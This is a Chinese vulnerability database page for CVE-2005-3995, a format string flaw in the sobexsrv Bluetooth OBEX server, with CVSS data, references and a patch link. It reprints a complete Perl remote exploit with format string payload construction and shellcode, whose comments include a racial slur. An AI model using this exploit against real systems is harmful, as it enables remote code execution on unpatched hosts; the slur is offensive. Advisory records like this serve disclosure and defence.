CVE-2005-3995
CVSS5.1
发布时间 :2005-12-04 19:03:00
修订时间 :2011-03-07 21:27:31
NMCOE    

[原文]Format string vulnerability in the dosyslog function in the OBEX server (obexsrv.c) for Sobexsrv before 1.0.0-pre4, when the syslog (-S) function is enabled, allows remote attackers to execute arbitrary code via format string specifiers in file name arguments to OBEX commands.


[CNNVD]Sobexsrv Dosyslog远程格式串处理漏洞(CNNVD-200512-068)

        sobexsrv是一款灵活、安全的蓝牙OBEX服务程序。
        sobexsrv的Dosyslog函数中存在格式串处理漏洞,成功利用这个漏洞的攻击者可以导致拒绝服务或远程执行任意代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3995
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3995
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-068
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15692
(PATCH)  BID  15692
http://www.digitalmunition.com/DMA%5B2005-1202a%5D.txt
(VENDOR_ADVISORY)  MISC  http://www.digitalmunition.com/DMA%5B2005-1202a%5D.txt
http://www.vupen.com/english/advisories/2005/2711
(UNKNOWN)  VUPEN  ADV-2005-2711
http://www.securityfocus.com/archive/1/archive/1/418515/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051203 DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'

- 漏洞信息

Sobexsrv Dosyslog远程格式串处理漏洞
中危 格式化字符串
2005-12-04 00:00:00 2012-12-26 00:00:00
远程  
        sobexsrv是一款灵活、安全的蓝牙OBEX服务程序。
        sobexsrv的Dosyslog函数中存在格式串处理漏洞,成功利用这个漏洞的攻击者可以导致拒绝服务或远程执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz

- 漏洞信息 (1355)

sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit (EDBID:1355)
linux remote
2005-12-03 Verified
0 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl
# 
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
#
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents. 

# R_386_JUMP_SLOT exit()
$addy  = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hi\n";
#print "lo: $lo\n";

$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";

$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);

system($string);

# milw0rm.com [2005-12-03]
		

- 漏洞信息

21567
sobexsrv -S Parameter Format String Arbitrary Command Execution
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-02 2005-11-03
2005-12-02 Unknow

- 解决方案

Upgrade to version 1.0.0.pre4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站